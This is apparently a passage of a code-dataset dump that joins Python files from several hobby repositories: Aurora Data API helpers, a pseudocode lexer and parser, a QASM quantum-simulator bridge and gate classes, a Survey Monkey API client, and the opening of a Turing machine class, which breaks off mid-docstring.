def get_column_types(column_metadata: List[Dict]) -> List[Callable]:
"""
Parses column_metadata to extract the column types.
Returns a list of callables, where each callable is the data type constructor for the related column type.
This allows us to parse column types such as DATETIME which aren't supported by the data api
:param column_metadata: The columnMetadata returned from the data API (list)
:return: (list)
"""
return [
get_column_type(column.get("typeName")) for column in column_metadata
]
def format_response(response: Dict) -> List[List]:
"""
:param response: Response dictionary from data api for a query.
:return: (list)
"""
column_types = get_column_types(response.get("columnMetadata"))
records = response.get("records")
return [format_record(record, column_types) for record in records]
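# Illustrative example of the shapes involved, using a minimal Data API response:
#   response = {
#       "columnMetadata": [{"typeName": "INT"}, {"typeName": "VARCHAR"}],
#       "records": [[{"longValue": 1}, {"stringValue": "Ada"}]]
#   }
#   format_response(response)  # -> [[1, "Ada"]]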
def format_value(value: Any) -> Dict[str, Any]:
"""
Returns value of an sql parameter according to the data api requirements.
:param value: value of parameter (Any)
:return: (dict)
"""
if isinstance(value, bytes):
return {"blobValue": value}
if isinstance(value, bool):
return {"booleanValue": value}
if isinstance(value, float):
return {"doubleValue": value}
if value is None:
return {"isNull": True}
if isinstance(value, int):
return {"longValue": value}
if isinstance(value, str):
return {"stringValue": value}
raise AuroraParameterException({
"message": "Unsupported parameter datatype.",
"parameter_value": value,
"supported_types": [
bytes, bool, float, int, str, None
]
})
def format_sql_parameters(sql_parameters: Dict[str, Any]) -> List[Dict[str, Union[str, Dict[str, Any]]]]:
"""
Formats the sql parameters according to the data api requirements.
:param sql_parameters: A dictionary with the following format:
sql_parameters = {
parameter_name: value,
.
.
.
}
:return: (list)
"""
return [
{"name": name, "value": format_value(value)} for name, value in sql_parameters.items()
]
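# Illustrative example of the parameter shape produced for the Data API:
#   format_sql_parameters({"id": 7, "name": "Ada"})
#   -> [{"name": "id", "value": {"longValue": 7}},
#       {"name": "name", "value": {"stringValue": "Ada"}}]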
def format_sql_query(sql: str, page: int, per_page: int) -> str:
"""
Formats an sql query with the required limit and offset.
:param sql: original sql query (string)
:param page: number of the current page (int)
:param per_page: number of records per page (int)
:return: (str)
"""
terminator_regex = r";"
limit_string = " LIMIT {} OFFSET {};".format(per_page, per_page * (page-1))
if not re.search(terminator_regex, sql):
return sql + limit_string
return re.sub(terminator_regex, limit_string, sql)
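# Illustrative example: requesting page 2 with 25 records per page.
#   format_sql_query("SELECT * FROM users;", page=2, per_page=25)
#   -> "SELECT * FROM users LIMIT 25 OFFSET 25;"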
def fetch_one(result_set: List[List]) -> Optional[List]:
"""
Returns the first record returned from a query.
If the result set is empty then None is returned
:param result_set: a list of records returned from AuroraDatabase.query (list)
:return: (list|None)
"""
return result_set[0] if result_set else None
``` |
{
"source": "johnyob/Pseudo",
"score": 3
} |
#### File: pyPseudo/lexer/Lexer.py
```python
from pyPseudo.error.ScanError import ScanError
from pyPseudo.lexer.Token import Token
from pyPseudo.lexer.TokenType import TokenType, keywords
class Lexer:
def __init__(self, source, path):
self._source = source
self._path = path
self._tokens = []
self._errors = []
self._start = 0
self._current = 0
self._line = 1
def scanTokens(self):
while not self._isAtEnd():
self._start = self._current
self._scanToken()
self._tokens.append(Token(TokenType.EOF, "", None, self._path, self._line))
return self._tokens
def getErrors(self):
return self._errors
def _case(self, character, comparableCharacter):
return character == comparableCharacter
def _scanToken(self):
character = self._move()
if self._case(character, "("):
self._addToken(TokenType.LEFT_PAREN)
elif self._case(character, ")"):
self._addToken(TokenType.RIGHT_PAREN)
elif self._case(character, "["):
self._addToken(TokenType.LEFT_SQUARE)
elif self._case(character, "]"):
self._addToken(TokenType.RIGHT_SQUARE)
elif self._case(character, "{"):
self._addToken(TokenType.LEFT_BRACE)
elif self._case(character, "}"):
self._addToken(TokenType.RIGHT_BRACE)
elif self._case(character, ","):
self._addToken(TokenType.COMMA)
elif self._case(character, "."):
self._addToken(TokenType.DOT)
elif self._case(character, "-"):
self._addToken(TokenType.MINUS)
elif self._case(character, "+"):
self._addToken(TokenType.PLUS)
elif self._case(character, ";"):
#self._addToken(TokenType.SEMICOLON)
pass
elif self._case(character, "*"):
self._addToken(TokenType.STAR)
elif self._case(character, "<"):
self._addToken(
TokenType.LEFT_ARROW if self._match("-") else TokenType.LESS_EQUAL \
if self._match("=") else TokenType.NOT_EQUAL if self._match(">") else \
TokenType.LESS
)
elif self._case(character, ">"):
self._addToken(
TokenType.GREATER_EQUAL if self._match("=") else TokenType.GREATER
)
elif self._case(character, "="):
self._addToken(TokenType.EQUAL)
elif self._case(character, "/"):
if self._match("/"):
while self._peek() != "\n" and not self._isAtEnd():
self._move()
else:
self._addToken(TokenType.SLASH)
elif self._case(character, " "):
pass
elif self._case(character, "\r"):
pass
elif self._case(character, "\t"):
pass
elif self._case(character, "\n"):
self._line += 1
elif self._case(character, "\""):
self._string()
else:
if self._isDigit(character):
self._number()
elif self._isAlpha(character):
self._identifier()
else:
                self._error("Unexpected character")
def _identifier(self):
while not self._isAtEnd() and self._isAlphaNumeric(self._peek()):
self._move()
text = self._source[self._start : self._current]
token = keywords.get(text, TokenType.IDENTIFIER)
self._addToken(token)
def _number(self):
while not self._isAtEnd() and self._isDigit(self._peek()):
self._move()
if self._peek() == "." and self._isDigit(self._peekNext()):
self._move()
while self._isDigit(self._peek()):
self._move()
literal = float(self._source[self._start : self._current])
self._addTokenLiteral(TokenType.NUMBER, literal)
def _string(self):
while self._peek() != "\"" and not self._isAtEnd():
if self._peek() == "\n":
self._line += 1
self._move()
if self._isAtEnd():
self._error("Unterminated string")
return
self._move()
literal = self._source[self._start + 1 : self._current - 1]
self._addTokenLiteral(TokenType.STRING, literal)
def _match(self, expected):
if self._isAtEnd():
return False
if self._source[self._current] != expected:
return False
self._current += 1
return True
def _peekNext(self):
if self._current + 1 >= len(self._source):
return '\0'
return self._source[self._current + 1]
def _peek(self):
if self._isAtEnd():
return '\0'
return self._source[self._current]
def _move(self):
self._current += 1
return self._source[self._current - 1]
def _addToken(self, type):
self._addTokenLiteral(type, None)
def _addTokenLiteral(self, type, literal):
lexeme = self._source[self._start : self._current]
self._tokens.append(Token(type, lexeme, literal, self._path, self._line))
def _isDigit(self, character):
return character.isdigit()
def _isAlpha(self, character):
return character.isalpha()
def _isAlphaNumeric(self, character):
return self._isDigit(character) or self._isAlpha(character)
def _isAtEnd(self):
return self._current >= len(self._source)
def _error(self, message):
self._errors.append(ScanError(self._path, self._line, message))
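# Minimal usage sketch (illustrative; the exact keyword spellings recognised by the
# lexer depend on the keywords mapping imported from TokenType):
#   lexer = Lexer('OUTPUT "hello"', "example.pseudo")
#   tokens = lexer.scanTokens()
#   errors = lexer.getErrors()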
```
#### File: pyPseudo/parser/Parser.py
```python
from pyPseudo.error.ParseError import ParseError
from pyPseudo.lexer.Lexer import Lexer
from pyPseudo.lexer.Token import Token
from pyPseudo.lexer.TokenType import TokenType
from pyPseudo.Utilities import readFile
import pyPseudo.parser.Expression as Expression
import pyPseudo.parser.Statement as Statement
class Parser:
def __init__(self, tokens):
self._current = 0
self._tokens = tokens
self._errors = []
def parse(self):
statements = []
while not self._isAtEnd():
statements.append(self._declaration())
return statements
def getErrors(self):
return self._errors
def _declaration(self):
try:
if self._match([TokenType.IMPORT]):
self._importModule()
if self._match([TokenType.CLASS]):
return self._classDeclaration()
if self._match([TokenType.FUNCTION]):
return self._functionDeclaration()
if self._match([TokenType.VAR]):
return self._variableDeclaration()
return self._statement()
except ParseError as e:
self._synchronise()
return None
def _importModule(self):
path = self._consume(TokenType.STRING, "Expect file path for module.").getLiteral()
#self._consume(TokenType.SEMICOLON, "Expect ';' after file path for module.")
lexer = Lexer(readFile(path), path)
moduleTokens = lexer.scanTokens()
del moduleTokens[-1]
self._tokens = self._tokens[ : self._current] + moduleTokens + self._tokens[self._current : ]
def _classDeclaration(self):
identifier = self._consume(TokenType.IDENTIFIER, "Expect class identifier.")
superClass = None
if self._match([TokenType.INHERITS]):
self._consume(TokenType.IDENTIFIER, "Expect superclass identifier.")
superClass = Expression.Variable(self._previous())
methods = []
while not self._check(TokenType.ENDCLASS) and not self._isAtEnd():
if self._match([TokenType.FUNCTION]):
methods.append(self._functionDeclaration())
self._consume(TokenType.ENDCLASS, "Expect 'ENDCLASS' after class body.")
return Statement.Class(identifier, superClass, methods)
def _functionDeclaration(self):
identifier = self._consume(TokenType.IDENTIFIER, "Expect function identifier.")
self._consume(TokenType.LEFT_PAREN, "Expect '(' after function identifier.")
parameters = []
if not self._check(TokenType.RIGHT_PAREN):
while True:
if len(parameters) >= 8:
self._error(self._peek(), "Cannot have more than 8 parameters.")
parameters.append(self._consume(TokenType.IDENTIFIER, "Expect parameter identifier."))
if not self._match([TokenType.COMMA]):
break
self._consume(TokenType.RIGHT_PAREN, "Expect ')' after parameters.")
body = self._bodyDeclaration(TokenType.ENDFUNCTION)
self._consume(TokenType.ENDFUNCTION, "Expect 'ENDFUNCTION' at the end of the function.")
return Statement.Function(identifier, parameters, body)
def _bodyDeclaration(self, terminator):
body = []
while not self._check(terminator) and not self._isAtEnd():
body.append(self._declaration())
return body
def _variableDeclaration(self):
identifier = self._consume(TokenType.IDENTIFIER, "Expect variable identifier.")
initializer = None
if self._match([TokenType.LEFT_ARROW]):
initializer = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after variable declaration.")
return Statement.Variable(identifier, initializer)
def _statement(self):
if self._match([TokenType.FOR]):
return self._forStatement()
if self._match([TokenType.IF]):
return self._ifStatement()
if self._match([TokenType.OUTPUT]):
return self._outputStatement()
if self._match([TokenType.RETURN]):
return self._returnStatement()
if self._match([TokenType.WHILE]):
return self._whileStatement()
return self._expressionStatement()
def _forStatement(self):
if self._match([TokenType.VAR]):
identifier = self._consume(TokenType.IDENTIFIER, "Expect variable identifier.")
self._consume(TokenType.LEFT_ARROW, "Expect '<-' after variable identifier.")
expression = self._expression()
initializer = Statement.Variable(identifier, expression)
else:
raise self._error(self._peek(), "Expect a variable declaration after 'FOR'.")
        self._consume(TokenType.TO, "Expect 'TO' after variable declaration.")
right = self._oneDimensionalArithmetic()
condition = Expression.Binary(
Expression.Variable(identifier),
Token(TokenType.LESS_EQUAL, "<=", None, "NULL", -1),
right
)
increment = Expression.Assign(identifier, Expression.Binary(
Expression.Variable(identifier),
Token(TokenType.PLUS, "+", None, "NULL", -1),
Expression.Literal(1.0)
))
self._consume(TokenType.DO, "Expect 'DO' at end of for loop initialization.")
body = self._bodyDeclaration(TokenType.ENDFOR)
self._consume(TokenType.ENDFOR, "Expect 'ENDFOR' at end of the for loop.")
body.append(Statement.Expression(increment))
return Statement.For(initializer, condition, body)
def _ifStatement(self):
condition = self._or()
self._consume(TokenType.THEN, "Expect 'THEN' after if statement condition.")
thenBranch = []
elseBranch = None
while not(self._check(TokenType.ENDIF) or self._check(TokenType.ELSE)) and not self._isAtEnd():
thenBranch.append(self._declaration())
if self._match([TokenType.ELSE]):
elseBranch = self._bodyDeclaration(TokenType.ENDIF)
self._consume(TokenType.ENDIF, "Expect 'ENDIF' at end of the if statement.")
return Statement.If(condition, thenBranch, elseBranch)
def _outputStatement(self):
value = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after output value.")
        return Statement.Output(value)
def _returnStatement(self):
keyword = self._previous()
value = None
if not self._check(TokenType.SEMICOLON):
value = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after return value.")
return Statement.Return(keyword, value)
def _whileStatement(self):
condition = self._expression()
self._consume(TokenType.DO, "Expect 'DO' after condition")
body = self._bodyDeclaration(TokenType.ENDWHILE)
        self._consume(TokenType.ENDWHILE, "Expect 'ENDWHILE' at the end of the while statement.")
return Statement.While(condition, body)
def _expressionStatement(self):
expression = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after expression.")
return Statement.Expression(expression)
def _expression(self):
return self._assignment()
def _assignment(self):
expression = self._or()
if self._match([TokenType.LEFT_ARROW]):
leftArrow = self._previous()
value = self._assignment()
if isinstance(expression, Expression.Variable):
identifier = expression.getIdentifier()
return Expression.Assign(identifier, value)
elif isinstance(expression, Expression.Get):
return Expression.Set(expression.getObject(), expression.getIdentifier(), value)
elif isinstance(expression, Expression.GetIndex):
return Expression.SetIndex(expression.getObject(), expression.getIndices(), expression.getBrackets(), value)
self._error(leftArrow, "Invalid assignment target.")
return expression
def _or(self):
expression = self._and()
while self._match([TokenType.OR]):
operator = self._previous()
right = self._and() #check this line!
expression = Expression.Logical(expression, operator, right)
return expression
def _and(self):
expression = self._equality()
while self._match([TokenType.AND]):
operator = self._previous()
right = self._equality()
expression = Expression.Logical(expression, operator, right)
return expression
def _equality(self):
expression = self._comparison()
while self._match([TokenType.NOT_EQUAL, TokenType.EQUAL]):
operator = self._previous()
right = self._comparison()
expression = Expression.Binary(expression, operator, right)
return expression
def _comparison(self):
expression = self._oneDimensionalArithmetic()
while self._match([TokenType.LESS, TokenType.GREATER, TokenType.LESS_EQUAL, TokenType.GREATER_EQUAL]):
operator = self._previous()
right = self._oneDimensionalArithmetic()
expression = Expression.Binary(expression, operator, right)
return expression
def _oneDimensionalArithmetic(self):
expression = self._twoDimensionalArithmetic()
while self._match([TokenType.PLUS, TokenType.MINUS]):
operator = self._previous()
right = self._twoDimensionalArithmetic()
expression = Expression.Binary(expression, operator, right)
return expression
def _twoDimensionalArithmetic(self):
expression = self._unary()
while self._match([TokenType.SLASH, TokenType.STAR]):
operator = self._previous()
right = self._unary()
expression = Expression.Binary(expression, operator, right)
return expression
def _unary(self):
if self._match([TokenType.NOT, TokenType.MINUS]):
operator = self._previous()
right = self._unary()
return Expression.Unary(operator, right)
return self._index()
def _functionCall(self):
expression = self._primary()
while True:
if self._match([TokenType.LEFT_PAREN]):
expression = self._finishFunctionCall(expression)
elif self._match([TokenType.DOT]):
identifier = self._consume(TokenType.IDENTIFIER, "Expect property identifier after '.'.")
expression = Expression.Get(expression, identifier)
else:
break
return expression
def _finishFunctionCall(self, caller):
arguments = []
if not self._check(TokenType.RIGHT_PAREN):
while True:
if len(arguments) >= 8:
self._error(self._peek(), "Cannot have more than 8 arguments.")
arguments.append(self._expression())
if not self._match([TokenType.COMMA]):
break
        parentheses = self._consume(TokenType.RIGHT_PAREN, "Expect ')' after arguments.")
        return Expression.Call(caller, parentheses, arguments)
def _index(self):
expression = self._functionCall()
if self._match([TokenType.LEFT_SQUARE]):
indices = []
while True:
if not self._peek().getType() in [TokenType.IDENTIFIER, TokenType.NUMBER]:
self._error(self._peek(), "Expect identifier or number for index value.")
indices.append(self._expression())
if not self._match([TokenType.COMMA]):
break
brackets = self._consume(TokenType.RIGHT_SQUARE, "Expect ']' after index value.")
return Expression.GetIndex(expression, indices, brackets)
return expression
def _primary(self):
if self._match([TokenType.FALSE]):
return Expression.Literal(False)
if self._match([TokenType.TRUE]):
return Expression.Literal(True)
if self._match([TokenType.NULL]):
return Expression.Literal(None)
if self._match([TokenType.NUMBER, TokenType.STRING]):
return Expression.Literal(self._previous().getLiteral())
if self._match([TokenType.SUPER]):
keyword = self._previous()
self._consume(TokenType.DOT, "Expect '.' after 'SUPER'.")
method = self._consume(TokenType.IDENTIFIER, "Expect super class method name.")
return Expression.Super(keyword, method)
if self._match([TokenType.THIS]):
return Expression.This(self._previous())
if self._match([TokenType.LEFT_BRACE]):
values = []
while True:
values.append(self._expression())
if not self._match([TokenType.COMMA]):
break
self._consume(TokenType.RIGHT_BRACE, "Expect '}' after values.")
return Expression.List(values)
if self._match([TokenType.IDENTIFIER]):
return Expression.Variable(self._previous())
if self._match([TokenType.LEFT_PAREN]):
expression = self._expression()
self._consume(TokenType.RIGHT_PAREN, "Expect ')' after expression.")
return Expression.Grouping(expression)
raise self._error(self._peek(), "Expect expression.")
def _consume(self, token, message):
if self._check(token):
return self._move()
raise self._error(self._peek(), message)
def _error(self, token, message):
self._errors.append(ParseError(token, message))
return self._errors[-1]
def _match(self, tokens):
for token in tokens:
if self._check(token):
self._move()
return True
return False
def _check(self, tokenType):
if self._isAtEnd():
return False
return self._peek().getType() == tokenType
def _move(self):
if not self._isAtEnd():
self._current += 1
return self._previous()
def _previous(self):
return self._tokens[self._current - 1]
def _peek(self):
return self._tokens[self._current]
def _isAtEnd(self):
return self._peek().getType() == TokenType.EOF
def _synchronise(self):
self._move()
while not self._isAtEnd():
if self._previous().getType() == TokenType.SEMICOLON:
return
if self._peek().getType() in [
TokenType.CLASS,
TokenType.FUNCTION,
TokenType.VAR,
TokenType.FOR,
TokenType.IF,
TokenType.WHILE,
TokenType.OUTPUT,
TokenType.RETURN
]:
return
self._move()
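# Minimal end-to-end sketch (illustrative; assumes 'OUTPUT' is among the keyword
# spellings registered in TokenType's keywords mapping):
#   tokens = Lexer('OUTPUT 1 + 2', "example.pseudo").scanTokens()
#   statements = Parser(tokens).parse()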
```
#### File: Pseudo/pyPseudo/Utilities.py
```python
def readFile(path):
try:
with open(path, "r") as file:
return file.read()
    except Exception:
print(
"{Error: Failed to load file. File doesn't exist or invalid file path, "
+ "Message: Please check arguments or import strings.}"
)
return ""
class Stack:
def __init__(self):
self._stack = []
def isEmpty(self):
return len(self._stack) == 0
def peek(self):
return self._stack[-1] if not self.isEmpty() else None
def push(self, element):
self._stack.append(element)
def pop(self):
return self._stack.pop() if not self.isEmpty() else None
def get(self, index):
return self._stack[index] if index < len(self._stack) and index >= 0 else None
def __len__(self):
return len(self._stack)
``` |
{
"source": "johnyob/QASM",
"score": 3
} |
#### File: qasm/bridge/Bridge.py
```python
from qasm.parser.Statement import StatementVisitor
from qasm.error.BridgeError import BridgeError
from quantum_computer import Computer
class Bridge(StatementVisitor):
def __init__(self, statements, qubits):
"""
Bridge constructor.
Bridge for qasm.parser.Statement.Statement objects.
Constructs a interface between the ASM and the Quantum Computer
:param statements: list of statements produced by the parser (list)
        :param qubits: number of qubits in the quantum computer (integer)
"""
self._statements = statements
self._qubits = qubits
self._quantum_computer = Computer(qubits)
self._errors = []
def _validate_qubit(self, qubit):
"""
If :param qubit out of index range -> bridge error raised.
:param qubit: (qasm.lexer.Token.Token)
:return: (None)
"""
if not 1 <= qubit.get_literal() <= self._qubits:
raise BridgeError(qubit, "Qubit index out of range")
def visit_pauli_x_statement(self, statement):
"""
Handles pauli x gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PauliX)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.X(qubit.get_literal())
def visit_pauli_y_statement(self, statement):
"""
Handles pauli y gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PauliY)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.Y(qubit.get_literal())
def visit_pauli_z_statement(self, statement):
"""
Handles pauli z gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PauliZ)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.Z(qubit.get_literal())
def visit_hadamard_statement(self, statement):
"""
Handles hadamard gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.Hadamard)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.H(qubit.get_literal())
def visit_phase_shift_statement(self, statement):
"""
Handles phase shift gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PhaseShift)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.R(qubit.get_literal(), statement.get_phi().get_literal())
def visit_sqrt_not_statement(self, statement):
"""
Handles sqrt not gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.SqrtNot)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.SqrtNOT(qubit.get_literal())
def visit_measure_statement(self, statement):
"""
        Handles observation (measurement) of the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.Measure)
:return: (None)
"""
print(self._quantum_computer.measure())
def execute(self):
"""
Executes statements stored in _statements.
        If a bridge error (or an error raised by the quantum computer) occurs during the execution of statements,
        the error is appended to the internal errors list and the program is halted.
:return: (None)
"""
try:
for statement in self._statements:
self._execute_statement(statement)
        except Exception as error:  # catches BridgeError and any error raised by the quantum computer
self._error(error)
return
def _execute_statement(self, statement):
"""
Executes :param statement using public AST (Abstract Syntax Tree) traversal method.
:param statement: (qasm.parser.Statement.Statement)
:return: (None)
"""
statement.accept(self)
def _error(self, error):
"""
Appends bridge error :param error to internal errors list
        :param error: (qasm.error.BridgeError.BridgeError)
:return: (None)
"""
self._errors.append(error)
def get_errors(self):
"""
Returns internal bridge errors
:return: (list)
"""
return self._errors
```
#### File: bridge/config/QuantumComputerConfig.py
```python
import json
from qasm.helpers.Exceptions import QASMConfigException
from qasm.helpers.Constants import QC_CONFIG
from qasm.helpers.Util import read_file
class QuantumComputerConfig:
@staticmethod
def get_config():
try:
return json.loads(read_file(QC_CONFIG))
        except Exception:
raise QASMConfigException({
"message": "quantum computer config not setup. Please use qasm config setup."
})
@staticmethod
def get_qubits():
return QuantumComputerConfig.get_config()["qubits"]
```
#### File: qasm/commands/Execute.py
```python
import sys
from qasm.commands.Command import Command
from qasm.helpers.Util import read_file
from qasm.parser.Parser import Parser
from qasm.lexer.Lexer import Lexer
from qasm.bridge.Bridge import Bridge
from qasm.bridge.config.QuantumComputerConfig import QuantumComputerConfig
class Execute(Command):
def __init__(self, arguments):
super().__init__(arguments)
self._file_location = self._arguments["<file>"]
def run(self):
errors, bridge_errors = self._run(read_file(self._file_location))
if errors:
sys.exit(65)
if bridge_errors:
sys.exit(70)
def _run(self, source):
lexer_errors, parser_errors, bridge_errors = [], [], []
lexer = Lexer(source)
tokens = lexer.scan_tokens()
lexer_errors = lexer.get_errors()
self._print_errors(lexer_errors)
if lexer_errors:
return lexer_errors + parser_errors, bridge_errors
parser = Parser(tokens)
statements = parser.parse()
parser_errors = parser.get_errors()
self._print_errors(parser_errors)
if parser_errors:
return lexer_errors + parser_errors, bridge_errors
bridge = Bridge(
statements, QuantumComputerConfig.get_qubits()
)
bridge.execute()
bridge_errors = bridge.get_errors()
self._print_errors(bridge_errors)
return lexer_errors + parser_errors, bridge_errors
def _print_errors(self, errors):
for error in errors:
if hasattr(error, "report"):
print(error.report(), file=sys.stderr)
else:
print("[ERROR] Error: QASMPythonError, Response: {0}".format(error), file=sys.stderr)
``` |
{
"source": "johnyob/Quantum-Computer-Simulator",
"score": 2
} |
#### File: quantum_computer_simulator/gates/R.py
```python
import numpy as np
from quantum_computer_simulator.gates.SingleQubitGate import SingleQubitGate
class R(SingleQubitGate):
def __init__(self, phi):
super().__init__(np.array([
[1, 0],
            [0, np.exp(1j * phi)]
], dtype=complex))
```
#### File: quantum_computer_simulator/gates/Z.py
```python
import numpy as np
from quantum_computer_simulator.gates.SingleQubitGate import SingleQubitGate
class Z(SingleQubitGate):
def __init__(self):
super().__init__(np.array([
[1, 0],
[0, -1]
], dtype=complex))
```
#### File: quantum_computer_simulator/simulator/Computer.py
```python
import numpy as np
from quantum_computer_simulator.helpers.Exceptions import QuantumRegisterException
from quantum_computer_simulator.helpers.Util import decimal_to_binary
import quantum_computer_simulator.gates as Gates
class Computer:
def __init__(self, qubits):
self._qubits = qubits
self._state = np.zeros(2 ** self._qubits, dtype=complex)
self._state[0] = 1 + 0j
self._measured_value = None
def _apply_gate(self, gate, *args):
if self._measured_value:
raise QuantumRegisterException({
"message": "cannot apply a gate to a measured quantum register"
})
logic_gate_matrix = gate.generate_gate_matrix(args, self._qubits)
print(logic_gate_matrix)
self._state = logic_gate_matrix.dot(self._state)
def measure(self):
if not self._measured_value:
print(self._state)
probabilities = [
abs(i) ** 2 for i in self._state
]
print(probabilities)
self._measured_value = "|psi> = |{0}>".format("".join(map(str, decimal_to_binary(
self._qubits,
np.random.choice(
range(len(probabilities)),
p=probabilities
)
))))
return self._measured_value
def X(self, qubit):
return self._apply_gate(Gates.X(), qubit)
def Y(self, qubit):
return self._apply_gate(Gates.Y(), qubit)
def Z(self, qubit):
return self._apply_gate(Gates.Z(), qubit)
def R(self, qubit, phi):
return self._apply_gate(Gates.R(phi), qubit)
def H(self, qubit):
return self._apply_gate(Gates.H(), qubit)
def SqrtNOT(self, qubit):
return self._apply_gate(Gates.SqrtNOT(), qubit)
def CNOT(self, qubit_1, qubit_2):
return self._apply_gate(Gates.CNOT(), qubit_1, qubit_2)
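# Minimal usage sketch (qubit indices follow the 1-based convention enforced by the
# QASM bridge earlier in this document):
#   computer = Computer(2)
#   computer.H(1)                # put qubit 1 into an equal superposition
#   print(computer.measure())    # e.g. "|psi> = |00>" or "|psi> = |10>"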
``` |
{
"source": "johnyob/Survey-Monkey-API-Client",
"score": 3
} |
#### File: Survey-Monkey-API-Client/survey_monkey/Client.py
```python
import requests
import json
from survey_monkey.helpers.Util import read_file, get_param_names, get_full_endpoint_path, get_headers, get_url
from survey_monkey.helpers.Constants import DEFAULT_ENDPOINTS_FILE_PATH, DEFAULT_VERSION
from survey_monkey.helpers.Exceptions import SurveyMonkeyAPIException
class Client:
def __init__(self, access_token, version=DEFAULT_VERSION, endpoints_file_path=DEFAULT_ENDPOINTS_FILE_PATH):
"""
Creates the API interface
:param access_token: Survey Monkey access token (string)
:param version: Survey Monkey API version (string)
:param endpoints_file_path: Absolute path for endpoints.json file (string)
"""
self._version = version
endpoints_json = json.loads(read_file(endpoints_file_path))
for endpoint in endpoints_json:
endpoint_function = self._get_endpoint_function(endpoint, access_token)
setattr(self, endpoint["identifier"], endpoint_function)
@property
def version(self):
return self._version
def _get_endpoint_function(self, endpoint, access_token):
"""
Produces function that interacts with the Survey Monkey API based on endpoint schema
:param endpoint: the endpoint schema for the Survey Monkey API endpoint (dict)
:param access_token: Survey Monkey access token (string)
:return: (function)
"""
identifier = endpoint["identifier"]
path = endpoint["endpoint path"]
param_names = get_param_names(path)
def endpoint_function(*args, **request_kwargs):
"""
Endpoint function
:param args: function arguments (list)
:param request_kwargs: requests.request kwargs
:return: (dict)
"""
if len(args) != len(param_names):
raise SurveyMonkeyAPIException({
"message": "{0} expects {1} arguments but got {2} arguments".format(
identifier,
len(param_names),
len(args)
)
})
return self._request(
endpoint["method"],
get_full_endpoint_path(path, param_names, args),
access_token,
**request_kwargs
)
endpoint_function.__name__ = identifier
return endpoint_function
def _request(self, method, path, access_token, **request_kwargs):
"""
Wrapper for requests.request
:param method: HTTP method such that method in {"GET", "POST", ...} (string)
:param path: endpoint path (contains params) (string)
:param access_token: Survey Monkey API access token (string)
:param request_kwargs: requests.request kwargs
:return: (dict)
"""
request_kwargs["headers"] = get_headers(
request_kwargs.get("headers", {}),
access_token
)
url = get_url(self.version, path)
response = requests.request(method, url, **request_kwargs)
return self._handle_response(response)
def _handle_response(self, response):
"""
Handles responses. If response is invalid, raises a SurveyMonkeyAPIException
:param response: response from API (response object)
:return: (dict)
"""
if not response.content:
raise SurveyMonkeyAPIException({
"message": "no content in response",
"response": response.json()
})
if not response.ok:
raise SurveyMonkeyAPIException({
"message": "Method: {0}, URL: {1}, Status Code: {2}".format(
response.request.method,
response.request.url,
response.status_code
),
"response": response.json()
})
return response.json()
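# Minimal usage sketch (illustrative; "get_survey" is a hypothetical identifier that
# would come from an endpoints.json entry with path "surveys/{survey_id}" and
# method "GET"):
#   client = Client("ACCESS_TOKEN")
#   survey = client.get_survey("177282517")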
```
#### File: survey_monkey/helpers/Util.py
```python
import re
from survey_monkey.helpers.Constants import DEFAULT_ADDRESS, PARAMETER_REGEX
def read_file(file_location):
"""
Reads the file stored at :param file_location
:param file_location: absolute path for the file to be read (string)
:return: contents of file (string)
"""
try:
with open(file_location, "r") as file:
return file.read()
except FileNotFoundError:
return ""
def get_param_names(path):
"""
Returns list of parameter names from the path.
For example, given the endpoint "groups/{group_id}", this function will return ["group_id"]
:param path: Survey Monkey API endpoint path (string)
:return: (list)
"""
return re.findall(PARAMETER_REGEX, path)
def get_full_endpoint_path(path, param_names, args):
"""
Get the full path for the api endpoint, includes parameters
:param path: Survey Monkey API endpoint path. For example, "survey/{survey_id}" (string)
:param param_names: Parameter names ["survey_id"] (list)
:param args: List of arguments that will be assigned to the parameters (list)
:return: (string)
"""
params = {
param_name: args[i]
for i, param_name in enumerate(param_names)
}
return path.format(**params)
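# Illustrative example:
#   get_full_endpoint_path("surveys/{survey_id}", ["survey_id"], ["177282517"])
#   -> "surveys/177282517"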
def get_headers(headers, access_token):
"""
Updates the headers with the Survey Monkey API access token
:param headers: HTTP headers (from request) (dict)
:param access_token: Survey Monkey access token (string)
:return: (dict)
"""
updated_headers = dict(headers)
updated_headers.update({
"Authorization": "Bearer {0}".format(access_token),
"Content-Type": "application/json"
})
return updated_headers
def get_url(version, path, address=DEFAULT_ADDRESS):
"""
Returns full url for the API request
:param version: API version. For example, "v3" (at the time of writing) (string)
:param path: API endpoint path with arguments. For example, "survey/177282517" (string)
:param address: API address. For example "http://api.surveymonkey.net" (string)
:return: (string)
"""
return address + "/" + version + "/" + path
``` |
{
"source": "johnyob/Turing-Machine-Simulator",
"score": 3
} |
#### File: Turing-Machine-Simulator/turing_machine/TuringMachine.py
```python
from turing_machine.helpers.Constants import STATE_TYPES, SYMBOL_TYPES, MOVEMENT_TYPES, BLANK
from turing_machine.TransitionFunctions import TransitionFunctions
import turing_machine.helpers.Exceptions as Exceptions
from turing_machine.State import State
from turing_machine.Tape import Tape
class TuringMachine:
def __init__(
self, states, alphabet, initial_state, accepting_states,
rejecting_states, transition_functions, trace_flag=False
):
"""
Turing Machine constructor
:param states: set of states in the turing machine (list: (string|integer))
:param alphabet: set of symbols in the turing machine's alphabet (list: string)
:param initial_state: initial state of the turing machine. initial_state \in states (string|integer)
:param accepting_states: accepting states of the turing machine. accepting_states \subseteq states (list: (string|integer))
